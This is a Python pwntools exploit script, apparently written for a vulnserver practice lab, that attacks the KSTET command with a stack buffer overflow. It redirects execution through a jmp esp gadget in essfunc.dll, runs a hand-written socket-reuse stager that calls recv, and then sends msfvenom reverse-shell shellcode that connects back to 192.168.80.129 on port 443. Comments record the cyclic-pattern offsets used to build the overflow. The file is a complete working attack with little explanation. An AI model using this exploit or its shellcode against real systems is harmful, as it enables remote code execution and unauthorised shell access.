from pwn import *
import time

host = "192.168.80.130"
port = 9999

#[+] Looking for cyclic pattern in memory
#    Cyclic pattern (normal) found at 0x0262f99a (length 90 bytes)
#    Cyclic pattern (normal) found at 0x00a34c22 (length 90 bytes)
#    EIP contains normal pattern : 0x41326341 (offset 66)
#    ESP (0x0262f9e0) points at offset 70 in normal pattern (length 20)
#    EBP contains normal pattern : 0x31634130 (offset 62)
#[+] Examining SEH chain
#[+] Examining stack (entire stack) - looking for cyclic pattern
#    Walking stack from 0x0262f000 to 0x0262fffc (0x00000ffc bytes)
#    0x0262f99c : Contains normal cyclic pattern at ESP-0x44 (-68) : offset 2, length 88 (-> 0x0262f9f3 : ESP+0x14)
#[+] Examining stack (entire stack) - looking for pointers to cyclic pattern
#    Walking stack from 0x0262f000 to 0x0262fffc (0x00000ffc bytes)
#    0x0262f948 : Pointer into normal cyclic pattern at ESP-0x98 (-152) : 0x0262f9a8 : offset 14, length 76
# All bytes allowed except \x00

crash = "KSTET /.:/"
#  0x62501203 : jmp esp | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\User\Downloads\vulnserver-master\vulnserver-master\essfunc.dll)
eip = "\x03\x12\x50\x62"
jmp = "\xeb\xb8"
nop = "\x90"

# socket reuse exploit
exploit = (
    b"\x90"
    b"\x54"                     # PUSH ESP
    b"\x59"                     # POP ECX
    b"\x66\x81\xC1\x88\x01"     # ADD CX,188 addres of socket filedescriptor
    b"\x83\xEC\x50"             # SUB ESP, 50 point ESP above our shellcode
    b"\x33\xD2"                 # XOR EDX,EDX
    b"\x52"                     # PUSH EDX push flags rcv function to stack
    b"\x80\xC6\x04"             # ADD DH,4 buffersize of 0x400 = 1024 bytes
    b"\x52"                     # PUSH EDX push rcv buffer size to stack
    b"\x54"                     # PUSH ESP
    b"\x5A"                     # POP EDX
    b"\x83\xC2\x50"             # ADD EDX, 50 ESP + 50 points to end of our nops
    b"\x52"                     # PUSH EDX push rcv buffer adres to the stack
    b"\xFF\x31"                 # PUSH DWORD PTR DS:[ECX] push socket filedescriptor to stack
    b"\xB8\x11\x2c\x25\x40"     # MOV EAX, 40252c11 mov adres net na call rcv in eax with 11 padding
    b"\xC1\xE8\x08"             # SHR EAX, 8 shift right 2 bytes(8bits) to avoid 00bytes
    b"\xFF\xD0"                 # CALL EAX call rcv function
)

#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.80.129 LPORT=443 -b "\x00" -f python -v shellcode exitfunc=thread
#Payload size: 351 bytes
shellcode =  b""
shellcode += b"\xba\x48\x0b\x6c\x3e\xdb\xd8\xd9\x74\x24\xf4"
shellcode += b"\x5e\x29\xc9\xb1\x52\x31\x56\x12\x83\xc6\x04"
shellcode += b"\x03\x1e\x05\x8e\xcb\x62\xf1\xcc\x34\x9a\x02"
shellcode += b"\xb1\xbd\x7f\x33\xf1\xda\xf4\x64\xc1\xa9\x58"
shellcode += b"\x89\xaa\xfc\x48\x1a\xde\x28\x7f\xab\x55\x0f"
shellcode += b"\x4e\x2c\xc5\x73\xd1\xae\x14\xa0\x31\x8e\xd6"
shellcode += b"\xb5\x30\xd7\x0b\x37\x60\x80\x40\xea\x94\xa5"
shellcode += b"\x1d\x37\x1f\xf5\xb0\x3f\xfc\x4e\xb2\x6e\x53"
shellcode += b"\xc4\xed\xb0\x52\x09\x86\xf8\x4c\x4e\xa3\xb3"
shellcode += b"\xe7\xa4\x5f\x42\x21\xf5\xa0\xe9\x0c\x39\x53"
shellcode += b"\xf3\x49\xfe\x8c\x86\xa3\xfc\x31\x91\x70\x7e"
shellcode += b"\xee\x14\x62\xd8\x65\x8e\x4e\xd8\xaa\x49\x05"
shellcode += b"\xd6\x07\x1d\x41\xfb\x96\xf2\xfa\x07\x12\xf5"
shellcode += b"\x2c\x8e\x60\xd2\xe8\xca\x33\x7b\xa9\xb6\x92"
shellcode += b"\x84\xa9\x18\x4a\x21\xa2\xb5\x9f\x58\xe9\xd1"
shellcode += b"\x6c\x51\x11\x22\xfb\xe2\x62\x10\xa4\x58\xec"
shellcode += b"\x18\x2d\x47\xeb\x5f\x04\x3f\x63\x9e\xa7\x40"
shellcode += b"\xaa\x65\xf3\x10\xc4\x4c\x7c\xfb\x14\x70\xa9"
shellcode += b"\xac\x44\xde\x02\x0d\x34\x9e\xf2\xe5\x5e\x11"
shellcode += b"\x2c\x15\x61\xfb\x45\xbc\x98\x6c\xaa\xe9\xf2"
shellcode += b"\xed\x42\xe8\xf2\xec\x29\x65\x14\x84\x5d\x20"
shellcode += b"\x8f\x31\xc7\x69\x5b\xa3\x08\xa4\x26\xe3\x83"
shellcode += b"\x4b\xd7\xaa\x63\x21\xcb\x5b\x84\x7c\xb1\xca"
shellcode += b"\x9b\xaa\xdd\x91\x0e\x31\x1d\xdf\x32\xee\x4a"
shellcode += b"\x88\x85\xe7\x1e\x24\xbf\x51\x3c\xb5\x59\x99"
shellcode += b"\x84\x62\x9a\x24\x05\xe6\xa6\x02\x15\x3e\x26"
shellcode += b"\x0f\x41\xee\x71\xd9\x3f\x48\x28\xab\xe9\x02"
shellcode += b"\x87\x65\x7d\xd2\xeb\xb5\xfb\xdb\x21\x40\xe3"
shellcode += b"\x6a\x9c\x15\x1c\x42\x48\x92\x65\xbe\xe8\x5d"
shellcode += b"\xbc\x7a\x08\xbc\x14\x77\xa1\x19\xfd\x3a\xac"
shellcode += b"\x99\x28\x78\xc9\x19\xd8\x01\x2e\x01\xa9\x04"
shellcode += b"\x6a\x85\x42\x75\xe3\x60\x64\x2a\x04\xa1"

buffer = crash + exploit
buffer += nop * (66 - len(exploit)) 
buffer += eip + jmp
buffer += nop * 18

print("total buffer : " + str(len(buffer)))

s = remote(host, port)
s.send(buffer)
time.sleep(1)
s.send(shellcode)

s.close()
